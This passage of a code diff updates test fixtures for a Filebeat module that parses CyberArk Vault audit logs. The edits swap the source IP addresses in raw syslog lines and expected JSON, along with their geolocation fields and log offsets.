         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMPGW_SSH",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 14 05:57:16",
         "event.action": "add user",
         "event.category": [
@@ -561,26 +536,29 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 6831,
+        "log.offset": 6820,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "34.71.250.247"
+            "81.2.69.143"
         ],
         "related.user": [
             "PSMPGW_SSH"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "34.71.250.247",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "34.71.250.247",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -594,11 +572,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:16Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Add User",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:16</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:16Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>180</MessageID>\n    <Desc>Add User</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add User</Action>\n    <SourceUser>PSMPApp_SSH</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add User</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:16</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:16Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>180</MessageID>\n    <Desc>Add User</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add User</Action>\n    <SourceUser>PSMPApp_SSH</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add User</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMPApp_SSH",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 14 05:57:16",
         "event.action": "add user",
         "event.category": [
@@ -618,26 +596,29 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 8235,
+        "log.offset": 8220,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "34.71.250.247"
+            "81.2.69.143"
         ],
         "related.user": [
             "PSMPApp_SSH"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "34.71.250.247",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "34.71.250.247",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -651,11 +632,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:21Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Add User",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:21</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:21Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>180</MessageID>\n    <Desc>Add User</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add User</Action>\n    <SourceUser>PSMP_ADB_asr-cyberark-psm-ssh</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add User</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:21</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:21Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>180</MessageID>\n    <Desc>Add User</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add User</Action>\n    <SourceUser>PSMP_ADB_asr-cyberark-psm-ssh</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add User</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMP_ADB_asr-cyberark-psm-ssh",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 14 05:57:21",
         "event.action": "add user",
         "event.category": [
@@ -675,26 +656,29 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 9641,
+        "log.offset": 9622,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "34.71.250.247"
+            "81.2.69.143"
         ],
         "related.user": [
             "PSMP_ADB_asr-cyberark-psm-ssh"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "34.71.250.247",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "34.71.250.247",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/181_update_safe.log b/x-pack/filebeat/module/cyberarkpas/audit/test/181_update_safe.log
index 93d8a45a00e8..f0502e8121d3 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/181_update_safe.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/181_update_safe.log
@@ -1 +1 @@
-<5>1 2021-03-10T18:15:44Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:15:44","IsoTimestamp":"2021-03-10T18:15:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"181","Desc":"Update Safe","Severity":"Info","Issuer":"Administrator","Action":"Update Safe","SourceUser":"","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Safe","GatewayStation":""}}}
+<5>1 2021-03-10T18:15:44Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:15:44","IsoTimestamp":"2021-03-10T18:15:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"181","Desc":"Update Safe","Severity":"Info","Issuer":"Administrator","Action":"Update Safe","SourceUser":"","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Safe","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/181_update_safe.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/181_update_safe.log-expected.json
index 6c43cfdf699f..e4d40a8d853d 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/181_update_safe.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/181_update_safe.log-expected.json
@@ -9,7 +9,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 10:15:44",
         "event.action": "update safe",
         "event.code": "181",
@@ -28,19 +28,16 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/185_add_safe.log b/x-pack/filebeat/module/cyberarkpas/audit/test/185_add_safe.log
index 21a17a2c729e..b74b3a9e7168 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/185_add_safe.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/185_add_safe.log
@@ -1,2 +1,2 @@
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"Administrator","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}}
-<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:13</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:13Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>185</MessageID>\n    <Desc>Add Safe</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Add Safe</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMRecordings</Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Safe</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"Administrator","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}}
+<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:13</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:13Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>185</MessageID>\n    <Desc>Add Safe</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Add Safe</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMRecordings</Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Safe</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/185_add_safe.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/185_add_safe.log-expected.json
index e84c490f6281..c93c6761e68e 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/185_add_safe.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/185_add_safe.log-expected.json
@@ -9,7 +9,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMPConf",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
         "event.action": "add safe",
         "event.code": "185",
@@ -28,19 +28,16 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -53,11 +50,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:38:13Z",
         "cyberarkpas.audit.issuer": "PSMPApp_VAGRANT",
         "cyberarkpas.audit.message": "Add Safe",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:13</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:13Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>185</MessageID>\n    <Desc>Add Safe</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Add Safe</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMRecordings</Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Safe</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:13</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:13Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>185</MessageID>\n    <Desc>Add Safe</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Add Safe</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMRecordings</Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Safe</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMRecordings",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 09:38:13",
         "event.action": "add safe",
         "event.code": "185",
@@ -69,26 +66,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 560,
+        "log.offset": 559,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/187_add_folder.log b/x-pack/filebeat/module/cyberarkpas/audit/test/187_add_folder.log
index 3f7fa511cc89..8ffa672992ed 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/187_add_folder.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/187_add_folder.log
@@ -1,2 +1,2 @@
-<5>1 2021-03-10T09:11:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:40","IsoTimestamp":"2021-03-10T09:11:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"187","Desc":"Add Folder","Severity":"Info","Issuer":"Administrator","Action":"Add Folder","SourceUser":"","TargetUser":"","Safe":"PSMPADBridgeConf","File":"Root\\Scripts\\","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Folder","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:40","IsoTimestamp":"2021-03-10T09:11:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"187","Desc":"Add Folder","Severity":"Info","Issuer":"Administrator","Action":"Add Folder","SourceUser":"","TargetUser":"","Safe":"PSMPADBridgeConf","File":"Root\\Scripts\\","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Folder","GatewayStation":""}}}
 <5>1 2021-03-11T18:01:14Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 10:01:14</Timestamp>\n    <IsoTimestamp>2021-03-11T18:01:14Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>187</MessageID>\n    <Desc>Add Folder</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PVWAAppUser</Issuer>\n    <Action>Add Folder</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMUnmanagedSessionAccounts</Safe>\n    <File>Root\\2\\</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Folder</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:01:14","IsoTimestamp":"2021-03-11T18:01:14Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"187","Desc":"Add Folder","Severity":"Info","Issuer":"PVWAAppUser","Action":"Add Folder","SourceUser":"","TargetUser":"","Safe":"PSMUnmanagedSessionAccounts","File":"Root\\2\\","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Folder","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/187_add_folder.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/187_add_folder.log-expected.json
index 35bafcb8bf3e..4322199b3565 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/187_add_folder.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/187_add_folder.log-expected.json
@@ -10,7 +10,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMPADBridgeConf",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:40",
         "event.action": "add folder",
         "event.code": "187",
@@ -30,19 +30,16 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -73,7 +70,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 589,
+        "log.offset": 588,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/19_full_gateway_connection.log b/x-pack/filebeat/module/cyberarkpas/audit/test/19_full_gateway_connection.log
index 88926eb15710..2aa2f5923ea4 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/19_full_gateway_connection.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/19_full_gateway_connection.log
@@ -1,9 +1,9 @@
 <5>1 2021-03-08T18:07:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:07:51","IsoTimestamp":"2021-03-08T18:07:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}}
-<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}}
-<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"37.223.7.45","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}}
